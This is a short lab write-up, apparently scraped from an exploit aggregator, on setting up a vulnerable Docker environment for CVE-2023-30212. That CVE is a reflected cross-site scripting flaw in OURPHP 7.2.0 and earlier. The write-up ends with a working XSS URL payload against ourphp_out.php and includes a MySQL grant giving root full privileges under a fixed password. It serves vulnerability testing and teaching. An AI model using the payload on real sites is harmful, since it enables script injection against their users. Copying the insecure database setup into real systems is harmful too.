## https://sploitus.com/exploit?id=C96F7F94-2E5D-5A57-B19A-2F6DA8535C10
# Creating a Vulnerable Docker Environment (CVE-2023-30212)
## **Description**
CVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0.
This vulnerability allows for Cross-Site Scripting (XSS) attacks
OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php
># Steps
- **letās download Dockerfile**
- **Open Terminal in the folder where you downloaded theĀ dockerfile**
- **Install Docker on your machine**
kali@kali:~$sudo apt install -y docker.io
- **Create a new Docker image**
kali@kali:~$docker build -t test
- **Create a new Docker container**
kali@kali:~$ docker run -d -p 80:80 test
># Configure the web
- **Take Docker shell**
kali@kali:~$docker ps
**Now get the containerĀ id like 0ac7c99ad8e7**
kali@kali:~ docker exec -it 0ac7c99ad8e7 /bin/bash
root@0ac7c99ad8e7:/var/www/html#
**Now get the docker shell**
- **Set up the database**
root@0ac7c99ad8e7:/var/www/html# mysql
**Then type these comments:-**
-GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY 'naseef' WITH GRANT OPTION;
-FLUSH PRIVILEGES;
*The command you provided is a MySQL or MariaDB statement used to grant all privileges to the 'root' user on all databases and tables. Let's break down the components of the command*
**Now the password is set, now go to the website and enter the passwordĀ andĀ configure**
># Exploiting vulnerability
url :- http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
*This website is xss vulnerable because xss script is hit when you enter thisĀ urlĀ parameter*